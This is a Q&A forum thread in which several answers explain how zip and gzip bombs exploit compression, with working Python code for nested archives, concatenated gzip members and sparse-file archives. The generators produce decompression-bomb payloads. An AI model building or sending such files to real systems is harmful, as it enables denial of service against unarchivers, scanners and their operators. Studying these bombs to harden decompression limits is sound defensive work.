How does one make a Zip bomb?

佛祖请我去吃肉 2020-12-12 11:13

This question about zip bombs naturally led me to the Wikipedia page on the topic. The article mentions an example of a 45.1 kB zip file that decompresses to 1.3 exabytes.

14 answers
  • 2020-12-12 11:22

    Serious answer:

    (Very basically) Compression relies on spotting repeating patterns, so the zip file would contain data representing something like

    0x100000000000000000000000000000000000  
    (Repeat this '0' ten trillion times)
    

    Very short zip file, but huge when you expand it.
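
    As a rough illustration of that ratio (just a sketch, not an actual bomb), compressing a megabyte of zero bytes with Python's zlib shrinks it to roughly a kilobyte:

        import zlib

        # A megabyte of identical bytes compresses to about a kilobyte,
        # a ratio on the order of 1000:1.
        data = b"\x00" * (1024 * 1024)
        packed = zlib.compress(data, level=9)
        print(len(data), "->", len(packed), "bytes")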

  • 2020-12-12 11:22

    Perhaps, on Unix, you could pipe a certain amount of zeros directly into a zip program? I don't know enough about Unix to explain exactly how you would do that, but essentially you would need a source of zeros and a compressor that reads them from stdin.
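
    A minimal sketch of that idea in Python (assuming a Unix-like system with the gzip utility on the PATH): feed a stream of zero bytes to gzip's stdin and let it write the compressed result straight to a file, so the uncompressed data never has to exist on disk.

        import subprocess

        chunk = b"\x00" * (1024 * 1024)   # 1 MiB of zeros per write
        total_chunks = 1024               # 1 GiB of input overall

        with open("bomb.gz", "wb") as out:
            # gzip -c compresses stdin and writes the result to stdout.
            proc = subprocess.Popen(["gzip", "-c"], stdin=subprocess.PIPE, stdout=out)
            for _ in range(total_chunks):
                proc.stdin.write(chunk)
            proc.stdin.close()
            proc.wait()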

  • 2020-12-12 11:25

    Silicon Valley Season 3 Episode 7 brought me here. The steps to generate a zip bomb would be:

    1. Create a dummy file full of zeros (or ones, if you think they're skinny) of some size, say 1 GB.
    2. Compress this file into a zip file, say 1.zip.
    3. Make n (say 10) copies of this archive and add these 10 files to a new compressed archive (say 2.zip).
    4. Repeat step 3 k times.
    5. You'll get a zip bomb.

    For a Python implementation, check this.
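
    A rough sketch of those steps with the standard-library zipfile module (file names, sizes and counts are purely illustrative):

        import zipfile

        n_copies = 10   # copies per layer (step 3)
        layers = 5      # how many times to repeat step 3 (k in step 4)

        # Steps 1-2: an archive containing a single file of zeros
        # (100 MB here so the demo stays quick).
        with zipfile.ZipFile("1.zip", "w", zipfile.ZIP_DEFLATED) as zf:
            zf.writestr("zeros.bin", b"\x00" * (100 * 1024 * 1024))

        # Steps 3-4: repeatedly pack n copies of the previous archive
        # into a new archive.  The copies are already compressed, so
        # ZIP_STORED is enough for the outer layers.
        inner = "1.zip"
        for layer in range(2, layers + 2):
            outer = "%d.zip" % layer
            with zipfile.ZipFile(outer, "w", zipfile.ZIP_STORED) as zf:
                for i in range(n_copies):
                    zf.write(inner, arcname="copy_%d_%s" % (i, inner))
            inner = outer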

  • 2020-12-12 11:30

    A nice way to create a zip bomb (or gzip bomb) is to know the binary format you are targeting. Otherwise, even if you use a streaming source (for example /dev/zero), you'll still be limited by the computing power needed to compress the stream.

    A nice example of a gzip bomb: http://selenic.com/googolplex.gz57 (there's a message embedded in the file, after several levels of compression resulting in huge files).

    Have fun finding that message :)
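
    One format detail that makes this easy for gzip: a .gz file may consist of several complete members concatenated back to back, and gunzip decompresses them all in sequence. So you can compress a block of zeros once and then just repeat the tiny compressed member, producing output far larger than anything you ever fed through the compressor. A minimal sketch (sizes illustrative):

        import gzip

        # Compress one megabyte of zeros once; the result is a complete
        # gzip member of roughly a kilobyte.
        member = gzip.compress(b"\x00" * (1024 * 1024))

        # Writing the member 10,000 times costs roughly 10 MB on disk
        # but decompresses to roughly 10 GB.
        with open("members.gz", "wb") as out:
            for _ in range(10_000):
                out.write(member)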

  • 2020-12-12 11:31

    To create one in a practical setting (i.e. without creating a 1.3 exabyte file on your enormous hard drive), you would probably have to learn the file format at a binary level and write something that directly produces what your desired file would look like post-compression.

  • 2020-12-12 11:33

    Recent (post-1995) compression algorithms like bzip2, LZMA (7-Zip) and RAR give spectacular compression of monotonous files, and a single layer of compression is sufficient to wrap oversized content down to a manageable size.

    Another approach could be to create a sparse file of extreme size (exabytes) and then compress it with something mundane that understands sparse files (e.g. tar). If the examiner streams the file, they will need to read past all the zeros that exist only to pad between the actual content; if the examiner writes it to disk, however, very little space will be used (assuming a well-behaved unarchiver and a modern filesystem).
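
    A small sketch of the sparse-file part (assuming a Unix-like system and a filesystem that supports holes, e.g. ext4 or XFS): truncate() extends a file without writing any data, so the apparent size can be enormous while almost no blocks are allocated, and a sparse-aware archiver such as GNU tar with --sparse can then pack it without storing the padding.

        import os

        path = "huge_sparse.bin"
        with open(path, "wb") as f:
            f.truncate(1 << 40)   # apparent size: 1 TiB, no data written

        st = os.stat(path)
        print("apparent size:", st.st_size)           # 1 TiB
        print("disk usage   :", st.st_blocks * 512)   # a few KiB at most
        # e.g. `tar --sparse -cf huge.tar huge_sparse.bin` archives it
        # without storing a terabyte of zeros.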
